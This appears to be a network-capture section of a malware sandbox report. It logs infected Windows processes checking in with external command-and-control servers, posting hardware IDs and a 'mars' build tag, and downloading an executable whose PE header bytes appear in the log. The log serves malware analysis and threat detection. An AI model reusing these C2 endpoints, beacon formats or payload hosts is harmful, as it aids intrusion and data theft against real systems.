Nov 11, 2024 10:34:30.802244902 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 11, 2024 10:34:31.445873976 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	50158	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:33.678364992 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 11, 2024 10:34:35.434551954 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Nov 11, 2024 10:34:35.435156107 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	50159	185.215.113.206	80	1888	C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:34.097793102 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 10:34:35.434847116 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:34:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 10:34:35.435000896 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:34:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 10:34:35.435071945 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:34:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 10:34:35.438205957 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 46 32 42 32 41 45 30 32 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="hwid"B6F2B2AE02294266498721------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="build"mars------CFHDHIJDGCBAKFIEGHCB--
Nov 11, 2024 10:34:35.644509077 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:34:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	50161	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:36.945250988 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 11, 2024 10:34:37.589210987 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50163	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:39.208791971 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 11, 2024 10:34:39.864187002 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50165	185.215.113.16	80	7848	C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:40.330987930 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Nov 11, 2024 10:34:40.974244118 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:40 GMT Content-Type: application/octet-stream Content-Length: 1845248 Last-Modified: Mon, 11 Nov 2024 09:18:03 GMT Connection: keep-alive ETag: "6731cbcb-1c2800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 d0 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 6b 00 00 04 00 00 7f 5e [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"j@k^@M$a$ $b@.rsrc $r@.idata $r@ p+$t@olxddulo0Pv@pxsrqflzj@.taggant0j"@
Nov 11, 2024 10:34:40.974280119 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:40.974291086 CET	424	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:40.974301100 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:40.974311113 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: -/
Nov 11, 2024 10:34:40.974323034 CET	424	IN	Data Raw: c9 e2 7a dc 77 df a0 b0 86 02 ca c3 76 ca 35 ca cc df 07 76 5d 5a 0a 2b 08 cf fa a7 b8 0e 8b 6a e1 a4 9c c3 93 cd 68 0c ae 4f 06 8c 91 21 8e e9 ed b2 13 7b 2e f9 63 5c 1f 48 92 b4 28 d8 fc a4 eb 46 dc 52 de 2d b4 24 94 c8 73 be ba f1 8a 7c 1e 7e Data Ascii: zwv5v]Z+jhO!{.c\H(FR-$s\|~K82KV5ZFq^ZX9qI@(b}{$~iLQ9L?WM+q*B.Vyp
Nov 11, 2024 10:34:40.974354982 CET	1236	IN	Data Raw: 61 de fd 83 a5 bc 10 a9 fe 9b a1 49 b0 d6 86 a6 39 1a 51 4b 6d 1d 18 b0 24 6b 3c c0 c0 ea a4 9d 2b 08 58 a6 74 1d cd 67 c6 ae 88 29 c4 08 e0 ed e1 13 b5 93 ff 49 2a 2b b7 ed df ba c3 cf 9c e7 bf 49 2d 6c aa f2 15 14 db c7 bc ab 0c 0f 97 e1 70 e3 Data Ascii: aI9QKm$k<+Xtg)I+I-lp:i!{zt?^{SS`Y1]MfqH-';qG,LNbG}#;l\By'=XrO&s9m +% ^,
Nov 11, 2024 10:34:40.974374056 CET	212	IN	Data Raw: 2b 77 c4 68 1e ce 5c ff ca d2 78 09 c5 ca 89 07 9d d2 4f a7 14 ee d1 84 47 1b 94 19 ea d2 73 9e db 41 13 46 e5 f8 c3 67 16 97 c2 07 ab 37 97 67 1f 47 c9 99 68 ea d0 d0 ee 52 ae ee 0d 48 51 bf ed e8 02 14 cb c9 58 81 d7 6a f8 0b cb c9 32 88 e0 32 Data Ascii: +wh\xOGsAFg7gGhRHQXj22w!SSg)qO.KhjQANy;GD"0f<jgY?o:#XXTR~bpW
Nov 11, 2024 10:34:40.974384069 CET	1236	IN	Data Raw: 6c 1c 29 7c 36 16 8a 5e 4d 49 39 98 a9 b8 07 cc 33 9c b4 67 74 8d e9 5d 6a a6 95 0b ac 34 12 d2 1c 9e db c9 e9 9b 42 aa 95 d3 25 99 80 08 95 b8 af bc d5 cf fa 69 19 d7 35 ed 98 79 b1 e4 89 40 a9 2e b0 f7 70 ee cf ba f2 88 eb 0c ae 73 c2 39 eb fb Data Ascii: l)\|6^MI93gt]j4B%i5y@.ps9pTf?{OH72t+3>qQg6\d{-N(IMYxJ!,QQT h'-!R
Nov 11, 2024 10:34:40.974397898 CET	1236	IN	Data Raw: f4 4a cb 6f ca fa 9e a7 b8 1c 9f b8 14 04 ab 23 fb e4 0f 62 29 df 98 2b 2d a6 11 e2 ad 0b cd 3f cb 7a 99 83 32 4e 78 ae 3e 38 ed b9 cc d0 9e e3 03 cf 61 ae 0e 38 cb b9 e8 dc 10 dc 35 89 0d 60 2d b6 cd 93 ca aa 13 aa 55 56 9f 9f cb 4f 9d 6d cd 7e Data Ascii: Jo#b)+-?z2Nx>8a85`-UVOm~.w{5C]:xpJPg(v[<(g!j55RTbP6X)QL$6OP\|/b
Nov 11, 2024 10:34:40.979466915 CET	1236	IN	Data Raw: cd c8 98 8f bf e7 ec a7 68 4e 6b dc 07 4a 92 9f be 8e cd 3b cb 92 9a 9d c8 2c bb 1b 94 d8 80 a9 5e 0c 9f 73 f9 fe 9e d7 2c e8 f4 21 ee 66 92 1e 63 24 cb b8 f8 da 54 b1 d1 4d ce a7 00 4e e9 dc 34 d0 9e 08 ee 14 b9 1f 19 0a 9d b9 03 f0 49 2c 21 dc Data Ascii: hNkJ;,^s,!fc$TMN4I,!(Xi}JR1v_aAn3X6rpN9!:3+pV,KQoiK)0hJ1%?r j7p(!0@x!9}P

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50166	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:41.378781080 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 11, 2024 10:34:42.023545980 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50167	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:43.736181974 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 11, 2024 10:34:44.349657059 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50168	185.215.113.206	80	7848	C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:44.828432083 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 11, 2024 10:34:45.466785908 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:34:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 10:34:45.470403910 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFCFHJDBKJKEBFHJEHI Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 46 32 42 32 41 45 30 32 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 2d 2d 0d 0a Data Ascii: ------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="hwid"B6F2B2AE02294266498721------HCFCFHJDBKJKEBFHJEHIContent-Disposition: form-data; name="build"mars------HCFCFHJDBKJKEBFHJEHI--
Nov 11, 2024 10:34:45.672516108 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:34:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50169	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:45.869189024 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 11, 2024 10:34:46.509057045 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50170	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:48.149528027 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 11, 2024 10:34:48.788640022 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50172	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:50.334616899 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 11, 2024 10:34:50.978305101 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50174	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:52.598829031 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 11, 2024 10:34:53.238001108 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50177	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:54.755640030 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 11, 2024 10:34:55.398087978 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50179	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:57.021703959 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 11, 2024 10:34:57.659646034 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50182	185.215.113.206	80	2124	C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:59.116014004 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
